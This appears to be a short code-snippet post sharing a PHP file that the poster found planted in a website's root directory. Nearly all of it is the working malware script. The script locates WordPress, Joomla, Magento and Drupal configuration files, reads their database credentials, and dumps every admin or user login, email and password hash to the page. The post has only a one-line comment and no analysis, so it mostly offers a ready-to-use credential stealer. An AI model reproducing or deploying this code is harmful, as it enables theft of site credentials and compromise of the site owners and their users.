Ideandro
1/3/2019 - 1:33 PM
WEBSITE HACK: SEL USER (PHP file)
Found it in root directory...
<?php
/****find config files****/
$rootpath = "";
if(isset($_SERVER["DOCUMENT_ROOT"]))
{
$rootpath = $_SERVER["DOCUMENT_ROOT"];
} else
{
$rootpath = preg_replace('/(htdocs|httpdocs|www)(.*)/','$1',dirname($_SERVER["SCRIPT_FILENAME"]));
}
$pathArr =array();
$startPath="";
$depth=0;
$sep = "/";
if (strstr($rootpath,"/"))
{
$pathArr = explode("/",$rootpath);
} elseif (strstr($rootpath,"\\"))
{
$pathArr = explode("\\",$rootpath);
$sep = "\\";
}
$depth = count($pathArr);
if($depth>=2)
{
$startPath = $pathArr[0];
for($i=1;$i<count($pathArr)-1;$i++)
{
$startPath = $startPath.$sep.$pathArr[$i];
$configs=findconfig($startPath,$depth);
if(count($configs))
{
break;
}
$depth--;
}
} else
{
$startPath = $rootpath;
$configs=findconfig($startPath,$depth);
}
if(count($configs)<=0)
{
$configs=findconfig($rootpath,2);
}
$addOk = false;
if(is_array($configs))
{
$configs = array_unique($configs);
foreach($configs as $config)
{
try{
$addedUsrs = NULL;
$cont = file_get_contents($config);
$cmstype = "";
if (stripos($config,"wp-config.php"))
{
$addedUsrs=setWPUser($cont);
$cmstype = "WORDPRESS";
} elseif(stripos($config,"configuration.php"))
{
$addedUsrs=setJMUser($cont);
$cmstype = "JOOMLA";
} elseif(stripos($config,"local.xml"))
{
$addedUsrs=setMGUser($cont,false);
$cmstype = "MAGENTO";
} elseif(stripos($config,"env.php"))
{
$addedUsrs=setMGUser($cont,true);
$cmstype = "MAGENTO";
} elseif(stripos($config,"settings.php"))
{
$addedUsrs=setDPUser($cont,true);
$cmstype = "DRUPAL";
}
if(is_array($addedUsrs))
{
try
{
$url = $addedUsrs["url"];
if(empty($url))
{$url=$config;}
if(!$addOk)
{
$addOk = true;
echo "explOK12345" ;
echo "<br>";
}
if(is_array($addedUsrs["data"]))
{
foreach ($addedUsrs["data"] as $usr)
{
echo $cmstype.":".$url.":".$usr."<br>";
}
}
}catch(Exception $e)
{ echo $e->getMessage();}
// echo "<br>";
}
}catch(Exception $e)
{;}
}
}
//unlink($_SERVER["SCRIPT_FILENAME"]);
//поиск конфигов
function findconfig($source,$depth)
{
$source = str_replace('\\', '/', realpath($source));
$result=array();
try
{
if (is_dir($source) === true)
{
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source,RecursiveDirectoryIterator::KEY_AS_PATHNAME), RecursiveIteratorIterator::SELF_FIRST,RecursiveIteratorIterator::CATCH_GET_CHILD);
$files->setMaxDepth($depth);
foreach ($files as $file => $fileInfo)
{
try{
$file = str_replace('\\', '/', $file);
$file2 = $file;
if( in_array(substr($file, strrpos($file, '/')+1), array('.', '..')) )
continue;
$file = realpath($file);
if ((is_file($file) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
{
$result[]=$file;
} elseif(is_dir($file)&&strstr($file2,"app/etc"))
{
//
//local.xml
if(file_exists(realpath($file."/env.php")))
{
$result[]= realpath($file."/env.php");
}
elseif(file_exists(realpath($file."/local.xml")))
{
$result[]= realpath($file."/local.xml");
}
}elseif(is_dir($file)&&strstr($file2,"sites/default"))
{
//
//local.xml
if(file_exists(realpath($file."/settings.php")))
{
$result[]= realpath($file."/settings.php");
}
}
}catch(Exception $iterex)
{
;
}
}
}
elseif ((is_file($source) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
{
$result[]=$file;
} elseif(is_dir($file)&&stristr($file,"app/etc"))
{
if(file_exists(realpath($file."/env.php")))
{
$result[]= realpath($file."/env.php");
}
elseif(file_exists(realpath($file."/local.xml")))
{
$result[]= realpath($file."/local.xml");
}
}elseif(is_dir($file)&&strstr($file2,"sites/default"))
{
//
//local.xml
if(file_exists(realpath($file."/settings.php")))
{
$result[]= realpath($file."/settings.php");
}
}
} catch (Exception $e) {
;
}
return $result;
}
function setWPUser($cont)
{
$db_name = NULL;
$db_user = NULL;
$db_pass = NULL;
$db_host= NULL;
$tbl_preffix="";
$db_preffix="";
$uri="";
preg_match_all('/(define\(\')([^\']+)(\',\s*\')([^\']+)/', $cont, $matches);
if(is_array($matches))
{
for($i=0;$i<count($matches[2]);$i++)
{
if(stristr($matches[2][$i],"DB_NAME"))
{$db_name=$matches[4][$i];}
elseif(stristr($matches[2][$i],"db_user"))
{$db_user=$matches[4][$i];}
elseif(stristr($matches[2][$i],"db_password"))
{$db_pass=$matches[4][$i];}
elseif(stristr($matches[2][$i],"db_host"))
{$db_host=$matches[4][$i];}
}
if(!empty($db_name))
{
preg_match('/(\$table_prefix\s*=\s*\')([^\']+)/', $cont, $mpreffix);
if(is_array($mpreffix)&&count($mpreffix)==3)
{$tbl_preffix=$mpreffix[2];}
if(function_exists('mysql_connect')){
if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
if(mysql_select_db($db_name,$con_mss))
{
$result = mysql_query ("SELECT option_value FROM ".$tbl_preffix."options where option_name='siteurl' ", $con_mss);
if($result)
{
$row = mysql_fetch_row($result);
if(is_array($row)&&count($row)>0)
$uri=trim($row[0]);
}
$ErrorMsg = "";
$result2 = mysql_query ("SELECT user_login,user_email,user_pass FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
if (!$ErrorMsg){
if (mysql_num_rows($result2)>0){
while ($row = mysql_fetch_row($result2)){
$usrArray[] = $row[0].":".$row[1].":".$row[2];
}
return Array("url"=>$uri,"data"=>$usrArray) ;
}
}
}
}
}
}
}
}
function setJMUser($cont)
{
$db_name = NULL;
$db_user = NULL;
$db_pass = NULL;
$db_host= NULL;
$tbl_preffix="";
$uri="";
preg_match_all('/(\$\w+\s*=\s*\')([^\']+)(\'\s*\;)/', $cont, $matches);
if(is_array($matches))
{
for($i=0;$i<count($matches[1]);$i++)
{
if(stristr($matches[1][$i],"\$db "))
{$db_name=$matches[2][$i];}
elseif(stristr($matches[1][$i],"\$user "))
{$db_user=$matches[2][$i];}
elseif(stristr($matches[1][$i],"\$password"))
{$db_pass=$matches[2][$i];}
elseif(stristr($matches[1][$i],"\$host"))
{$db_host=$matches[2][$i];}
elseif(stristr($matches[1][$i],"\$dbprefix"))
{$tbl_preffix=$matches[2][$i];}
elseif(stristr($matches[1][$i],"\$sitename"))
{$uri=$matches[2][$i];}
}
if(!empty($db_name))
{
if(function_exists('mysql_connect')){
if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
if(mysql_select_db($db_name,$con_mss))
{
$ErrorMsg = "";
$result2 = mysql_query ("SELECT username,email,password FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
if (!$ErrorMsg){
if (mysql_num_rows($result2)>0){
while ($row = mysql_fetch_row($result2)){
$usrArray[] = $row[0].":".$row[1].":".$row[2];
}
return Array("url"=>$uri,"data"=>$usrArray) ;
}
}
}
}
}
}
}
}
function setMGUser($cont,$ismg2)
{
$db_name = NULL;
$db_user = NULL;
$db_pass = NULL;
$db_host= NULL;
$tbl_preffix="";
$uri="";
$roletbl="";
if(!$ismg2&&stristr($cont,"<?xml version"))
{
$dbdata = new SimpleXMLElement($cont);
$db_name = $dbdata->global->resources->default_setup->connection->dbname;
$db_user = $dbdata->global->resources->default_setup->connection->username;
$db_pass = $dbdata->global->resources->default_setup->connection->password;
$db_host= $dbdata->global->resources->default_setup->connection->host;
$tbl_preffix=$dbdata->global->resources->db->table_prefix;
} elseif($ismg2&&stristr($cont,"'host' =>"))
{
//'host' => 'localhost',
preg_match_all('/(\')(\w+)(\'\s*\=\>\s*\')([^\']+)/', $cont, $matches);
if(is_array($matches))
{
for($i=0;$i<count($matches[2]);$i++)
{
if(stristr($matches[2][$i],"dbname"))
{$db_name=$matches[4][$i];}
elseif(stristr($matches[2][$i],"username"))
{$db_user=$matches[4][$i];}
elseif(stristr($matches[2][$i],"password"))
{$db_pass=$matches[4][$i];}
elseif(stristr($matches[2][$i],"host"))
{$db_host=$matches[4][$i];}
elseif(stristr($matches[2][$i],"table_prefix"))
{$tbl_preffix=$matches[4][$i];}
}
}
}
if(!is_null($db_name)&&!empty($db_name))
{
if(function_exists('mysql_connect')){
if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
if(mysql_select_db($db_name,$con_mss))
{
$result = mysql_query ("SELECT value FROM ".$tbl_preffix."core_config_data where path='web/unsecure/base_url' ", $con_mss);
if($result)
{
$row = mysql_fetch_row($result);
if(is_array($row)&&count($row)>0)
$uri=trim($row[0]);
}
$ErrorMsg = "";
$result2 = mysql_query ("SELECT username,email,password FROM ".$tbl_preffix."admin_user", $con_mss) or $ErrorMsg = mysql_error();
if (!$ErrorMsg){
if (mysql_num_rows($result2)>0){
while ($row = mysql_fetch_row($result2)){
$usrArray[] = $row[0].":".$row[1].":".$row[2];
}
return Array("url"=>$uri,"data"=>$usrArray) ;
}
}
}
}
}
}
}
function setDPUser($cont)
{
$db_name = NULL;
$db_user = NULL;
$db_pass = NULL;
$db_host= NULL;
$tbl_preffix="";
$uri="";
$roletbl="";
if(stristr($cont,"'host' =>"))
{
//'host' => 'localhost',
preg_match_all('/^(\s+\')(\w+)(\'\s*\=\>\s*\')([^\']+)/m', $cont, $matches);
if(is_array($matches))
{
for($i=0;$i<count($matches[2]);$i++)
{
if(stristr($matches[2][$i],"database"))
{$db_name=$matches[4][$i];}
elseif(stristr($matches[2][$i],"username"))
{$db_user=$matches[4][$i];}
elseif(stristr($matches[2][$i],"password"))
{$db_pass=$matches[4][$i];}
elseif(stristr($matches[2][$i],"host"))
{$db_host=$matches[4][$i];}
elseif(stristr($matches[2][$i],"prefix"))
{$tbl_preffix=$matches[4][$i];}
}
}
}
if(!is_null($db_name)&&!empty($db_name))
{
if(function_exists('mysql_connect')){
if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
if(mysql_select_db($db_name,$con_mss))
{
$result = mysql_query ("SELECT value FROM ".$tbl_preffix."variable where name='site_name' ", $con_mss);
if($result)
{
$row = mysql_fetch_row($result);
if(is_array($row)&&count($row)>0)
$uri= unserialize(trim($row[0]));
}
$ErrorMsg = "";
$result2 = mysql_query ("SELECT name,mail,pass FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
if ($ErrorMsg)
{
$ErrorMsg = "";
$result2 = mysql_query ("SELECT name,mail,pass FROM ".$tbl_preffix."users_field_data", $con_mss) or $ErrorMsg = mysql_error();
}
if (!$ErrorMsg){
if (mysql_num_rows($result2)>0){
while ($row = mysql_fetch_row($result2)){
$usrArray[] = $row[0].":".$row[1].":".$row[2];
}
return Array("url"=>$uri,"data"=>$usrArray) ;
}
}
}
}
}
}
}
?>